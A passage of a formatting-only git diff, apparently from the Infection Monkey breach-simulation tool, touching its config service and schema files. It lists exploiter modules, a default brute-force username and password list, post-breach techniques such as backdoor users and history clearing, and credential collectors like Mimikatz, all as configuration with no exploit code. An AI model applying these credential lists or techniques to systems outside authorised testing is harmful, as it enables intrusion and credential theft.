str, will_monkey_run: bool) -> NodeStates: - group_keywords = [system, 'monkey'] - if 'group' in node and node['group'] == 'island': - group_keywords.extend(['island', 'starting']) + group_keywords = [system, "monkey"] + if "group" in node and node["group"] == "island": + group_keywords.extend(["island", "starting"]) else: - group_keywords.append('starting') if will_monkey_run else group_keywords.append('old') + group_keywords.append("starting") if will_monkey_run else group_keywords.append("old") node_group = NodeStates.get_by_keywords(group_keywords) return node_group @staticmethod def get_mongo_id_for_bootloader_telem(bootloader_telem) -> ObjectId: - ip_hash = hex(hash(str(bootloader_telem['ips'])))[3:15] - hostname_hash = hex(hash(bootloader_telem['hostname']))[3:15] + ip_hash = hex(hash(str(bootloader_telem["ips"])))[3:15] + hostname_hash = hex(hash(bootloader_telem["hostname"]))[3:15] return ObjectId(ip_hash + hostname_hash) @staticmethod def is_os_compatible(bootloader_data) -> bool: - if bootloader_data['system'] == 'windows': - return BootloaderService.is_windows_version_supported(bootloader_data['os_version']) - elif bootloader_data['system'] == 'linux': - return BootloaderService.is_glibc_supported(bootloader_data['glibc_version']) + if bootloader_data["system"] == "windows": + return BootloaderService.is_windows_version_supported(bootloader_data["os_version"]) + elif bootloader_data["system"] == "linux": + return BootloaderService.is_glibc_supported(bootloader_data["glibc_version"]) @staticmethod def is_windows_version_supported(windows_version) -> bool: @@ -61,8 +63,8 @@ class BootloaderService: @staticmethod def is_glibc_supported(glibc_version_string) 
-> bool: glibc_version_string = glibc_version_string.lower() - glibc_version = glibc_version_string.split(' ')[-1] - return glibc_version >= str(MIN_GLIBC_VERSION) and 'eglibc' not in glibc_version_string + glibc_version = glibc_version_string.split(" ")[-1] + return glibc_version >= str(MIN_GLIBC_VERSION) and "eglibc" not in glibc_version_string @staticmethod def remove_local_ips(ip_list) -> List[str]: diff --git a/monkey/monkey_island/cc/services/bootloader_test.py b/monkey/monkey_island/cc/services/bootloader_test.py index f71c36184..81c4affff 100644 --- a/monkey/monkey_island/cc/services/bootloader_test.py +++ b/monkey/monkey_island/cc/services/bootloader_test.py @@ -10,23 +10,24 @@ WINDOWS_VERSIONS = { "6.1": "Windows 7/server 2008R2", "6.2": "Windows 8/server 2012", "6.3": "Windows 8.1/server 2012R2", - "10.0": "Windows 10/server 2016-2019" + "10.0": "Windows 10/server 2016-2019", } MIN_GLIBC_VERSION = 2.14 class TestBootloaderService(TestCase): - def test_is_glibc_supported(self): str1 = "ldd (Ubuntu EGLIBC 2.15-0ubuntu10) 2.15" str2 = "ldd (GNU libc) 2.12" str3 = "ldd (GNU libc) 2.28" str4 = "ldd (Ubuntu GLIBC 2.23-0ubuntu11) 2.23" - self.assertTrue(not BootloaderService.is_glibc_supported(str1) and - not BootloaderService.is_glibc_supported(str2) and - BootloaderService.is_glibc_supported(str3) and - BootloaderService.is_glibc_supported(str4)) + self.assertTrue( + not BootloaderService.is_glibc_supported(str1) + and not BootloaderService.is_glibc_supported(str2) + and BootloaderService.is_glibc_supported(str3) + and BootloaderService.is_glibc_supported(str4) + ) def test_remove_local_ips(self): ips = ["127.1.1.1", "127.0.0.1", "192.168.56.1"] diff --git a/monkey/monkey_island/cc/services/config.py b/monkey/monkey_island/cc/services/config.py index 9fd8e3417..5978431d6 100644 --- a/monkey/monkey_island/cc/services/config.py +++ b/monkey/monkey_island/cc/services/config.py @@ -14,24 +14,29 @@ from monkey_island.cc.services.config_schema.config_schema import SCHEMA __author__ = "itay.mizeretz" -from common.config_value_paths import (AWS_KEYS_PATH, EXPORT_MONKEY_TELEMS_PATH, - LM_HASH_LIST_PATH, NTLM_HASH_LIST_PATH, - PASSWORD_LIST_PATH, SSH_KEYS_PATH, - STARTED_ON_ISLAND_PATH, USER_LIST_PATH) +from common.config_value_paths import ( + AWS_KEYS_PATH, + EXPORT_MONKEY_TELEMS_PATH, + LM_HASH_LIST_PATH, + NTLM_HASH_LIST_PATH, + PASSWORD_LIST_PATH, + SSH_KEYS_PATH, + STARTED_ON_ISLAND_PATH, + USER_LIST_PATH, +) logger = logging.getLogger(__name__) # This should be used for config values of array type (array of strings only) -ENCRYPTED_CONFIG_VALUES = \ - [ - PASSWORD_LIST_PATH, - LM_HASH_LIST_PATH, - NTLM_HASH_LIST_PATH, - SSH_KEYS_PATH, - AWS_KEYS_PATH + ['aws_access_key_id'], - AWS_KEYS_PATH + ['aws_secret_access_key'], - AWS_KEYS_PATH + ['aws_session_token'] - ] +ENCRYPTED_CONFIG_VALUES = [ + PASSWORD_LIST_PATH, + LM_HASH_LIST_PATH, + NTLM_HASH_LIST_PATH, + SSH_KEYS_PATH, + AWS_KEYS_PATH + ["aws_access_key_id"], + AWS_KEYS_PATH + ["aws_secret_access_key"], + AWS_KEYS_PATH + ["aws_session_token"], +] class ConfigService: @@ -49,13 +54,16 @@ class ConfigService: :param is_island: If True, will include island specific configuration parameters. :return: The entire global config. 
""" - config = mongo.db.config.find_one({'name': 'initial' if is_initial_config else 'newconfig'}) or {} - for field in ('name', '_id'): + config = ( + mongo.db.config.find_one({"name": "initial" if is_initial_config else "newconfig"}) + or {} + ) + for field in ("name", "_id"): config.pop(field, None) if should_decrypt and len(config) > 0: ConfigService.decrypt_config(config) if not is_island: - config.get('cnc', {}).pop('aws_config', None) + config.get("cnc", {}).pop("aws_config", None) return config @staticmethod @@ -68,8 +76,10 @@ class ConfigService: (if it's in the list of encrypted config values). :return: The value of the requested config key. """ - config_key = functools.reduce(lambda x, y: x + '.' + y, config_key_as_arr) - config = mongo.db.config.find_one({'name': 'initial' if is_initial_config else 'newconfig'}, {config_key: 1}) + config_key = functools.reduce(lambda x, y: x + "." + y, config_key_as_arr) + config = mongo.db.config.find_one( + {"name": "initial" if is_initial_config else "newconfig"}, {config_key: 1} + ) for config_key_part in config_key_as_arr: config = config[config_key_part] if should_decrypt: @@ -83,8 +93,7 @@ class ConfigService: @staticmethod def set_config_value(config_key_as_arr, value): mongo_key = ".".join(config_key_as_arr) - mongo.db.config.update({'name': 'newconfig'}, - {"$set": {mongo_key: value}}) + mongo.db.config.update({"name": "newconfig"}, {"$set": {mongo_key: value}}) @staticmethod def get_flat_config(is_initial_config=False, should_decrypt=True): @@ -107,71 +116,67 @@ class ConfigService: @staticmethod def add_item_to_config_set_if_dont_exist(item_path_array, item_value, should_encrypt): - item_key = '.'.join(item_path_array) + item_key = ".".join(item_path_array) items_from_config = ConfigService.get_config_value(item_path_array, False, should_encrypt) if item_value in items_from_config: return if should_encrypt: item_value = get_encryptor().enc(item_value) mongo.db.config.update( - {'name': 'newconfig'}, - {'$addToSet': {item_key: item_value}}, - upsert=False + {"name": "newconfig"}, {"$addToSet": {item_key: item_value}}, upsert=False ) mongo.db.monkey.update( - {}, - {'$addToSet': {'config.' + item_key.split('.')[-1]: item_value}}, - multi=True + {}, {"$addToSet": {"config." 
+ item_key.split(".")[-1]: item_value}}, multi=True ) @staticmethod def creds_add_username(username): - ConfigService.add_item_to_config_set_if_dont_exist(USER_LIST_PATH, - username, - should_encrypt=False) + ConfigService.add_item_to_config_set_if_dont_exist( + USER_LIST_PATH, username, should_encrypt=False + ) @staticmethod def creds_add_password(password): - ConfigService.add_item_to_config_set_if_dont_exist(PASSWORD_LIST_PATH, - password, - should_encrypt=True) + ConfigService.add_item_to_config_set_if_dont_exist( + PASSWORD_LIST_PATH, password, should_encrypt=True + ) @staticmethod def creds_add_lm_hash(lm_hash): - ConfigService.add_item_to_config_set_if_dont_exist(LM_HASH_LIST_PATH, - lm_hash, - should_encrypt=True) + ConfigService.add_item_to_config_set_if_dont_exist( + LM_HASH_LIST_PATH, lm_hash, should_encrypt=True + ) @staticmethod def creds_add_ntlm_hash(ntlm_hash): - ConfigService.add_item_to_config_set_if_dont_exist(NTLM_HASH_LIST_PATH, - ntlm_hash, - should_encrypt=True) + ConfigService.add_item_to_config_set_if_dont_exist( + NTLM_HASH_LIST_PATH, ntlm_hash, should_encrypt=True + ) @staticmethod def ssh_add_keys(public_key, private_key, user, ip): if not ConfigService.ssh_key_exists( - ConfigService.get_config_value(SSH_KEYS_PATH, False, False), user, ip): + ConfigService.get_config_value(SSH_KEYS_PATH, False, False), user, ip + ): ConfigService.add_item_to_config_set_if_dont_exist( SSH_KEYS_PATH, - { - "public_key": public_key, - "private_key": private_key, - "user": user, "ip": ip - }, + {"public_key": public_key, "private_key": private_key, "user": user, "ip": ip}, # SSH keys already encrypted in process_ssh_info() - should_encrypt=False - + should_encrypt=False, ) @staticmethod def ssh_key_exists(keys, user, ip): - return [key for key in keys if key['user'] == user and key['ip'] == ip] + return [key for key in keys if key["user"] == user and key["ip"] == ip] def _filter_none_values(data): if isinstance(data, dict): - return {k: ConfigService._filter_none_values(v) for k, v in data.items() if k is not None and v is not None} + return { + k: ConfigService._filter_none_values(v) + for k, v in data.items() + if k is not None and v is not None + } elif isinstance(data, list): return [ConfigService._filter_none_values(item) for item in data if item is not None] else: @@ -186,16 +191,18 @@ class ConfigService: try: ConfigService.encrypt_config(config_json) except KeyError: - logger.error('Bad configuration file was submitted.') + logger.error("Bad configuration file was submitted.") return False - mongo.db.config.update({'name': 'newconfig'}, {"$set": config_json}, upsert=True) - logger.info('monkey config was updated') + mongo.db.config.update({"name": "newconfig"}, {"$set": config_json}, upsert=True) + logger.info("monkey config was updated") return True @staticmethod def init_default_config(): if ConfigService.default_config is None: - default_validating_draft4_validator = ConfigService._extend_config_with_default(Draft4Validator) + default_validating_draft4_validator = ConfigService._extend_config_with_default( + Draft4Validator + ) config = {} default_validating_draft4_validator(SCHEMA).validate(config) ConfigService.default_config = config @@ -221,25 +228,29 @@ class ConfigService: config = ConfigService.get_default_config(True) ConfigService.set_server_ips_in_config(config) ConfigService.update_config(config, should_encrypt=False) - logger.info('Monkey config reset was called') + logger.info("Monkey config reset was called") @staticmethod def 
set_server_ips_in_config(config): ips = local_ip_addresses() - config["internal"]["island_server"]["command_servers"] = \ - ["%s:%d" % (ip, env_singleton.env.get_island_port()) for ip in ips] - config["internal"]["island_server"]["current_server"] = "%s:%d" % (ips[0], env_singleton.env.get_island_port()) + config["internal"]["island_server"]["command_servers"] = [ + "%s:%d" % (ip, env_singleton.env.get_island_port()) for ip in ips + ] + config["internal"]["island_server"]["current_server"] = "%s:%d" % ( + ips[0], + env_singleton.env.get_island_port(), + ) @staticmethod def save_initial_config_if_needed(): - if mongo.db.config.find_one({'name': 'initial'}) is not None: + if mongo.db.config.find_one({"name": "initial"}) is not None: return - initial_config = mongo.db.config.find_one({'name': 'newconfig'}) - initial_config['name'] = 'initial' - initial_config.pop('_id') + initial_config = mongo.db.config.find_one({"name": "newconfig"}) + initial_config["name"] = "initial" + initial_config.pop("_id") mongo.db.config.insert(initial_config) - logger.info('Monkey config was inserted to mongo and saved') + logger.info("Monkey config was inserted to mongo and saved") @staticmethod def _extend_config_with_default(validator_class): @@ -260,9 +271,11 @@ class ConfigService: layer_3_dict = {} for property4, subschema4 in list(subschema3["properties"].items()): if "properties" in subschema4: - raise ValueError("monkey/monkey_island/cc/services/config.py " - "can't handle 5 level config. " - "Either change back the config or refactor.") + raise ValueError( + "monkey/monkey_island/cc/services/config.py " + "can't handle 5 level config. " + "Either change back the config or refactor." + ) if "default" in subschema4: layer_3_dict[property4] = subschema4["default"] sub_dict[property3] = layer_3_dict @@ -273,7 +286,8 @@ class ConfigService: yield error return validators.extend( - validator_class, {"properties": set_defaults}, + validator_class, + {"properties": set_defaults}, ) @staticmethod @@ -292,10 +306,18 @@ class ConfigService: keys = [config_arr_as_array[-1] for config_arr_as_array in ENCRYPTED_CONFIG_VALUES] for key in keys: - if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], str): + if isinstance(flat_config[key], collections.Sequence) and not isinstance( + flat_config[key], str + ): # Check if we are decrypting ssh key pair - if flat_config[key] and isinstance(flat_config[key][0], dict) and 'public_key' in flat_config[key][0]: - flat_config[key] = [ConfigService.decrypt_ssh_key_pair(item) for item in flat_config[key]] + if ( + flat_config[key] + and isinstance(flat_config[key][0], dict) + and "public_key" in flat_config[key][0] + ): + flat_config[key] = [ + ConfigService.decrypt_ssh_key_pair(item) for item in flat_config[key] + ] else: flat_config[key] = [get_encryptor().dec(item) for item in flat_config[key]] else: @@ -316,23 +338,33 @@ class ConfigService: if isinstance(config_arr, collections.Sequence) and not isinstance(config_arr, str): for i in range(len(config_arr)): # Check if array of shh key pairs and then decrypt - if isinstance(config_arr[i], dict) and 'public_key' in config_arr[i]: - config_arr[i] = ConfigService.decrypt_ssh_key_pair(config_arr[i]) if is_decrypt else \ - ConfigService.decrypt_ssh_key_pair(config_arr[i], True) + if isinstance(config_arr[i], dict) and "public_key" in config_arr[i]: + config_arr[i] = ( + ConfigService.decrypt_ssh_key_pair(config_arr[i]) + if is_decrypt + else ConfigService.decrypt_ssh_key_pair(config_arr[i], True) + 
) else: - config_arr[i] = get_encryptor().dec(config_arr[i]) if is_decrypt else get_encryptor().enc(config_arr[i]) + config_arr[i] = ( + get_encryptor().dec(config_arr[i]) + if is_decrypt + else get_encryptor().enc(config_arr[i]) + ) else: - parent_config_arr[config_arr_as_array[-1]] = \ - get_encryptor().dec(config_arr) if is_decrypt else get_encryptor().enc(config_arr) + parent_config_arr[config_arr_as_array[-1]] = ( + get_encryptor().dec(config_arr) + if is_decrypt + else get_encryptor().enc(config_arr) + ) @staticmethod def decrypt_ssh_key_pair(pair, encrypt=False): if encrypt: - pair['public_key'] = get_encryptor().enc(pair['public_key']) - pair['private_key'] = get_encryptor().enc(pair['private_key']) + pair["public_key"] = get_encryptor().enc(pair["public_key"]) + pair["private_key"] = get_encryptor().enc(pair["private_key"]) else: - pair['public_key'] = get_encryptor().dec(pair['public_key']) - pair['private_key'] = get_encryptor().dec(pair['private_key']) + pair["public_key"] = get_encryptor().dec(pair["public_key"]) + pair["private_key"] = get_encryptor().dec(pair["private_key"]) return pair @staticmethod diff --git a/monkey/monkey_island/cc/services/config_schema/basic.py b/monkey/monkey_island/cc/services/config_schema/basic.py index 0fa0b80d4..aaf2e570e 100644 --- a/monkey/monkey_island/cc/services/config_schema/basic.py +++ b/monkey/monkey_island/cc/services/config_schema/basic.py @@ -12,9 +12,7 @@ BASIC = { "title": "Exploiters", "type": "array", "uniqueItems": True, - "items": { - "$ref": "#/definitions/exploiter_classes" - }, + "items": {"$ref": "#/definitions/exploiter_classes"}, "default": [ "SmbExploiter", "WmiExploiter", @@ -27,10 +25,10 @@ BASIC = { "HadoopExploiter", "VSFTPDExploiter", "MSSQLExploiter", - "DrupalExploiter" - ] + "DrupalExploiter", + ], } - } + }, }, "credentials": { "title": "Credentials", @@ -40,24 +38,16 @@ BASIC = { "title": "Exploit user list", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, - "default": [ - "Administrator", - "root", - "user" - ], + "items": {"type": "string"}, + "default": ["Administrator", "root", "user"], "description": "List of user names that will be used by exploiters that need credentials, like " - "SSH brute-forcing." + "SSH brute-forcing.", }, "exploit_password_list": { "title": "Exploit password list", "type": "array", "uniqueItems": True, - "items": { - "type": "string" - }, + "items": {"type": "string"}, "default": [ "root", "123456", @@ -65,12 +55,12 @@ BASIC = { "123456789", "qwerty", "111111", - "iloveyou" + "iloveyou", ], "description": "List of passwords that will be used by exploiters that need credentials, like " - "SSH brute-forcing." - } - } - } - } + "SSH brute-forcing.", + }, + }, + }, + }, } diff --git a/monkey/monkey_island/cc/services/config_schema/basic_network.py b/monkey/monkey_island/cc/services/config_schema/basic_network.py index 5ae044d95..c515a8cbc 100644 --- a/monkey/monkey_island/cc/services/config_schema/basic_network.py +++ b/monkey/monkey_island/cc/services/config_schema/basic_network.py @@ -17,49 +17,42 @@ BASIC_NETWORK = { "type": "string", "format": IP, }, - "default": [ - ], + "default": [], "description": "List of IPs that the Monkey will not scan.", - "info": "The Monkey scans its subnet if \"Local network scan\" is ticked. " - "Additionally the monkey scans machines according to \"Scan target list\"." + "info": 'The Monkey scans its subnet if "Local network scan" is ticked. 
' + 'Additionally the monkey scans machines according to "Scan target list".', }, "local_network_scan": { "title": "Local network scan", "type": "boolean", "default": True, "description": "Determines whether the Monkey will scan the local subnets of machines it runs on, " - "in addition to the IPs that are configured manually in the \"Scan target list\"." + 'in addition to the IPs that are configured manually in the "Scan target list".', }, "depth": { "title": "Scan depth", "type": "integer", "minimum": 1, "default": 2, - "description": - "Amount of hops allowed for the Monkey to spread from the Island server. \n" - + WARNING_SIGN - + " Note that setting this value too high may result in the Monkey propagating too far, " - "if the \"Local network scan\" is enabled." + "description": "Amount of hops allowed for the Monkey to spread from the Island server. \n" + + WARNING_SIGN + + " Note that setting this value too high may result in the Monkey propagating too far, " + 'if the "Local network scan" is enabled.', }, "subnet_scan_list": { "title": "Scan target list", "type": "array", "uniqueItems": True, - "items": { - "type": "string", - "format": IP_RANGE - }, - "default": [ - ], - "description": - "List of targets the Monkey will try to scan. Targets can be IPs, subnets or hosts." - " Examples:\n" - "\tTarget a specific IP: \"192.168.0.1\"\n" - "\tTarget a subnet using a network range: \"192.168.0.5-192.168.0.20\"\n" - "\tTarget a subnet using an IP mask: \"192.168.0.5/24\"\n" - "\tTarget a specific host: \"printer.example\"" - } - } + "items": {"type": "string", "format": IP_RANGE}, + "default": [], + "description": "List of targets the Monkey will try to scan. Targets can be IPs, subnets or hosts." + " Examples:\n" + '\tTarget a specific IP: "192.168.0.1"\n' + '\tTarget a subnet using a network range: "192.168.0.5-192.168.0.20"\n' + '\tTarget a subnet using an IP mask: "192.168.0.5/24"\n' + '\tTarget a specific host: "printer.example"', + }, + }, }, "network_analysis": { "title": "Network Analysis", @@ -69,27 +62,22 @@ BASIC_NETWORK = { "title": "Network segmentation testing", "type": "array", "uniqueItems": True, - "items": { - "type": "string", - "format": IP_RANGE - }, - "default": [ - ], - "description": - "Test for network segmentation by providing a list of network segments " - "that should NOT be accessible to each other.\n\n" - "For example, if you configured the following three segments: " - "\"10.0.0.0/24\", \"11.0.0.2/32\", and \"12.2.3.0/24\", " - "a Monkey running on 10.0.0.5 will try to access machines in the following subnets: " - "11.0.0.2/32, 12.2.3.0/24. An alert on successful cross-segment connections " - "will be shown in the reports. \n\n" - "Network segments can be IPs, subnets or hosts. Examples:\n" - "\tDefine a single-IP segment: \"192.168.0.1\"\n" - "\tDefine a segment using a network range: \"192.168.0.5-192.168.0.20\"\n" - "\tDefine a segment using an subnet IP mask: \"192.168.0.5/24\"\n" - "\tDefine a single-host segment: \"printer.example\"" + "items": {"type": "string", "format": IP_RANGE}, + "default": [], + "description": "Test for network segmentation by providing a list of network segments " + "that should NOT be accessible to each other.\n\n" + "For example, if you configured the following three segments: " + '"10.0.0.0/24", "11.0.0.2/32", and "12.2.3.0/24", ' + "a Monkey running on 10.0.0.5 will try to access machines in the following subnets: " + "11.0.0.2/32, 12.2.3.0/24. 
An alert on successful cross-segment connections " + "will be shown in the reports. \n\n" + "Network segments can be IPs, subnets or hosts. Examples:\n" + '\tDefine a single-IP segment: "192.168.0.1"\n' + '\tDefine a segment using a network range: "192.168.0.5-192.168.0.20"\n' + '\tDefine a segment using an subnet IP mask: "192.168.0.5/24"\n' + '\tDefine a single-host segment: "printer.example"', } - } - } - } + }, + }, + }, } diff --git a/monkey/monkey_island/cc/services/config_schema/config_schema.py b/monkey/monkey_island/cc/services/config_schema/config_schema.py index 17d7752c0..3900b0675 100644 --- a/monkey/monkey_island/cc/services/config_schema/config_schema.py +++ b/monkey/monkey_island/cc/services/config_schema/config_schema.py @@ -2,9 +2,12 @@ from monkey_island.cc.services.config_schema.basic import BASIC from monkey_island.cc.services.config_schema.basic_network import BASIC_NETWORK from monkey_island.cc.services.config_schema.definitions.exploiter_classes import EXPLOITER_CLASSES from monkey_island.cc.services.config_schema.definitions.finger_classes import FINGER_CLASSES -from monkey_island.cc.services.config_schema.definitions.post_breach_actions import POST_BREACH_ACTIONS -from monkey_island.cc.services.config_schema.definitions.system_info_collector_classes import \ - SYSTEM_INFO_COLLECTOR_CLASSES +from monkey_island.cc.services.config_schema.definitions.post_breach_actions import ( + POST_BREACH_ACTIONS, +) +from monkey_island.cc.services.config_schema.definitions.system_info_collector_classes import ( + SYSTEM_INFO_COLLECTOR_CLASSES, +) from monkey_island.cc.services.config_schema.internal import INTERNAL from monkey_island.cc.services.config_schema.monkey import MONKEY @@ -18,8 +21,7 @@ SCHEMA = { "exploiter_classes": EXPLOITER_CLASSES, "system_info_collector_classes": SYSTEM_INFO_COLLECTOR_CLASSES, "post_breach_actions": POST_BREACH_ACTIONS, - "finger_classes": FINGER_CLASSES - + "finger_classes": FINGER_CLASSES, }, "properties": { "basic": BASIC, @@ -27,7 +29,5 @@ SCHEMA = { "monkey": MONKEY, "internal": INTERNAL, }, - "options": { - "collapsed": True - } + "options": {"collapsed": True}, } diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/finger_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/finger_classes.py index 427c72bb3..c5de894d4 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/finger_classes.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/finger_classes.py @@ -1,85 +1,69 @@ FINGER_CLASSES = { "title": "Fingerprint class", "description": "Fingerprint modules collect info about external services " - "Infection Monkey scans.", + "Infection Monkey scans.", "type": "string", "anyOf": [ { "type": "string", - "enum": [ - "SMBFinger" - ], + "enum": ["SMBFinger"], "title": "SMBFinger", "safe": True, "info": "Figures out if SMB is running and what's the version of it.", - "attack_techniques": ["T1210"] + "attack_techniques": ["T1210"], }, { "type": "string", - "enum": [ - "SSHFinger" - ], + "enum": ["SSHFinger"], "title": "SSHFinger", "safe": True, "info": "Figures out if SSH is running.", - "attack_techniques": ["T1210"] + "attack_techniques": ["T1210"], }, { "type": "string", - "enum": [ - "PingScanner" - ], + "enum": ["PingScanner"], "title": "PingScanner", "safe": True, - "info": "Tries to identify if host is alive and which OS it's running by ping scan." 
+ "info": "Tries to identify if host is alive and which OS it's running by ping scan.", }, { "type": "string", - "enum": [ - "HTTPFinger" - ], + "enum": ["HTTPFinger"], "title": "HTTPFinger", "safe": True, - "info": "Checks if host has HTTP/HTTPS ports open." + "info": "Checks if host has HTTP/HTTPS ports open.", }, { "type": "string", - "enum": [ - "MySQLFinger" - ], + "enum": ["MySQLFinger"], "title": "MySQLFinger", "safe": True, "info": "Checks if MySQL server is running and tries to get it's version.", - "attack_techniques": ["T1210"] + "attack_techniques": ["T1210"], }, { "type": "string", - "enum": [ - "MSSQLFinger" - ], + "enum": ["MSSQLFinger"], "title": "MSSQLFinger", "safe": True, "info": "Checks if Microsoft SQL service is running and tries to gather information about it.", - "attack_techniques": ["T1210"] + "attack_techniques": ["T1210"], }, { "type": "string", - "enum": [ - "ElasticFinger" - ], + "enum": ["ElasticFinger"], "title": "ElasticFinger", "safe": True, "info": "Checks if ElasticSearch is running and attempts to find it's version.", - "attack_techniques": ["T1210"] + "attack_techniques": ["T1210"], }, { "type": "string", - "enum": [ - "PostgreSQLFinger" - ], + "enum": ["PostgreSQLFinger"], "title": "PostgreSQLFinger", "info": "Checks if PostgreSQL service is running and if its communication is encrypted.", - "attack_techniques": ["T1210"] - } - ] + "attack_techniques": ["T1210"], + }, + ], } diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py b/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py index 857e80da4..ea9b18aba 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/post_breach_actions.py @@ -1,123 +1,101 @@ POST_BREACH_ACTIONS = { "title": "Post breach actions", "description": "Runs scripts/commands on infected machines. These actions safely simulate what an adversary" - "might do after breaching a new machine. Used in ATT&CK and Zero trust reports.", + "might do after breaching a new machine. Used in ATT&CK and Zero trust reports.", "type": "string", "anyOf": [ { "type": "string", - "enum": [ - "BackdoorUser" - ], + "enum": ["BackdoorUser"], "title": "Back door user", "safe": True, "info": "Attempts to create a new user on the system and delete it afterwards.", - "attack_techniques": ["T1136"] + "attack_techniques": ["T1136"], }, { "type": "string", - "enum": [ - "CommunicateAsNewUser" - ], + "enum": ["CommunicateAsNewUser"], "title": "Communicate as new user", "safe": True, "info": "Attempts to create a new user, create HTTPS requests as that user and delete the user " - "afterwards.", - "attack_techniques": ["T1136"] + "afterwards.", + "attack_techniques": ["T1136"], }, { "type": "string", - "enum": [ - "ModifyShellStartupFiles" - ], + "enum": ["ModifyShellStartupFiles"], "title": "Modify shell startup files", "safe": True, "info": "Attempts to modify shell startup files, like ~/.profile, ~/.bashrc, ~/.bash_profile " - "in linux, and profile.ps1 in windows. Reverts modifications done afterwards.", - "attack_techniques": ["T1156", "T1504"] + "in linux, and profile.ps1 in windows. 
Reverts modifications done afterwards.", + "attack_techniques": ["T1156", "T1504"], }, { "type": "string", - "enum": [ - "HiddenFiles" - ], + "enum": ["HiddenFiles"], "title": "Hidden files and directories", "safe": True, "info": "Attempts to create a hidden file and remove it afterward.", - "attack_techniques": ["T1158"] + "attack_techniques": ["T1158"], }, { "type": "string", - "enum": [ - "TrapCommand" - ], + "enum": ["TrapCommand"], "title": "Trap", "safe": True, "info": "On Linux systems, attempts to trap an interrupt signal in order to execute a command " - "upon receiving that signal. Removes the trap afterwards.", - "attack_techniques": ["T1154"] + "upon receiving that signal. Removes the trap afterwards.", + "attack_techniques": ["T1154"], }, { "type": "string", - "enum": [ - "ChangeSetuidSetgid" - ], + "enum": ["ChangeSetuidSetgid"], "title": "Setuid and Setgid", "safe": True, "info": "On Linux systems, attempts to set the setuid and setgid bits of a new file. " - "Removes the file afterwards.", - "attack_techniques": ["T1166"] + "Removes the file afterwards.", + "attack_techniques": ["T1166"], }, { "type": "string", - "enum": [ - "ScheduleJobs" - ], + "enum": ["ScheduleJobs"], "title": "Job scheduling", "safe": True, "info": "Attempts to create a scheduled job on the system and remove it.", - "attack_techniques": ["T1168", "T1053"] + "attack_techniques": ["T1168", "T1053"], }, { "type": "string", - "enum": [ - "Timestomping" - ], + "enum": ["Timestomping"], "title": "Timestomping", "safe": True, "info": "Creates a temporary file and attempts to modify its time attributes. Removes the file afterwards.", - "attack_techniques": ["T1099"] + "attack_techniques": ["T1099"], }, { "type": "string", - "enum": [ - "SignedScriptProxyExecution" - ], + "enum": ["SignedScriptProxyExecution"], "title": "Signed script proxy execution", "safe": False, "info": "On Windows systems, attempts to execute an arbitrary file " - "with the help of a pre-existing signed script.", - "attack_techniques": ["T1216"] + "with the help of a pre-existing signed script.", + "attack_techniques": ["T1216"], }, { "type": "string", - "enum": [ - "AccountDiscovery" - ], + "enum": ["AccountDiscovery"], "title": "Account Discovery", "safe": True, "info": "Attempts to get a listing of user accounts on the system.", - "attack_techniques": ["T1087"] + "attack_techniques": ["T1087"], }, { "type": "string", - "enum": [ - "ClearCommandHistory" - ], + "enum": ["ClearCommandHistory"], "title": "Clear command history", "safe": False, "info": "Attempts to clear the command history.", - "attack_techniques": ["T1146"] - } - ] + "attack_techniques": ["T1146"], + }, + ], } diff --git a/monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py b/monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py index cd756ed61..487166ec6 100644 --- a/monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py +++ b/monkey/monkey_island/cc/services/config_schema/definitions/system_info_collector_classes.py @@ -1,6 +1,11 @@ -from common.common_consts.system_info_collectors_names import (AWS_COLLECTOR, AZURE_CRED_COLLECTOR, - ENVIRONMENT_COLLECTOR, HOSTNAME_COLLECTOR, - MIMIKATZ_COLLECTOR, PROCESS_LIST_COLLECTOR) +from common.common_consts.system_info_collectors_names import ( + AWS_COLLECTOR, + AZURE_CRED_COLLECTOR, + ENVIRONMENT_COLLECTOR, + HOSTNAME_COLLECTOR, + MIMIKATZ_COLLECTOR, + PROCESS_LIST_COLLECTOR, +) SYSTEM_INFO_COLLECTOR_CLASSES = { 
"title": "System Information Collectors", @@ -9,63 +14,51 @@ SYSTEM_INFO_COLLECTOR_CLASSES = { "anyOf": [ { "type": "string", - "enum": [ - ENVIRONMENT_COLLECTOR - ], + "enum": [ENVIRONMENT_COLLECTOR], "title": "Environment collector", "safe": True, "info": "Collects information about machine's environment (on premise/GCP/AWS).", - "attack_techniques": ["T1082"] + "attack_techniques": ["T1082"], }, { "type": "string", - "enum": [ - MIMIKATZ_COLLECTOR - ], + "enum": [MIMIKATZ_COLLECTOR], "title": "Mimikatz collector", "safe": True, "info": "Collects credentials from Windows credential manager.", - "attack_techniques": ["T1003", "T1005"] + "attack_techniques": ["T1003", "T1005"], }, { "type": "string", - "enum": [ - AWS_COLLECTOR - ], + "enum": [AWS_COLLECTOR], "title": "AWS collector", "safe": True, "info": "If on AWS, collects more information about the AWS instance currently running on.", - "attack_techniques": ["T1082"] + "attack_techniques": ["T1082"], }, { "type": "string", - "enum": [ - HOSTNAME_COLLECTOR - ], + "enum": [HOSTNAME_COLLECTOR], "title": "Hostname collector", "safe": True, "info": "Collects machine's hostname.", - "attack_techniques": ["T1082", "T1016"] + "attack_techniques": ["T1082", "T1016"], }, { "type": "string", - "enum": [ - PROCESS_LIST_COLLECTOR - ], + "enum": [PROCESS_LIST_COLLECTOR], "title": "Process list collector", "safe": True, "info": "Collects a list of running processes on the machine.", - "attack_techniques": ["T1082"] + "attack_techniques": ["T1082"], }, { "type": "string", - "enum": [ - AZURE_CRED_COLLECTOR - ], + "enum": [AZURE_CRED_COLLECTOR], "title": "Azure credential collector", "safe": True, "info": "Collects password credentials from Azure VMs", - "attack_techniques": ["T1003", "T1005"] - } - ] + "attack_techniques": ["T1003", "T1005"], + }, + ], } diff --git a/monkey/monkey_island/cc/services/config_schema/internal.py 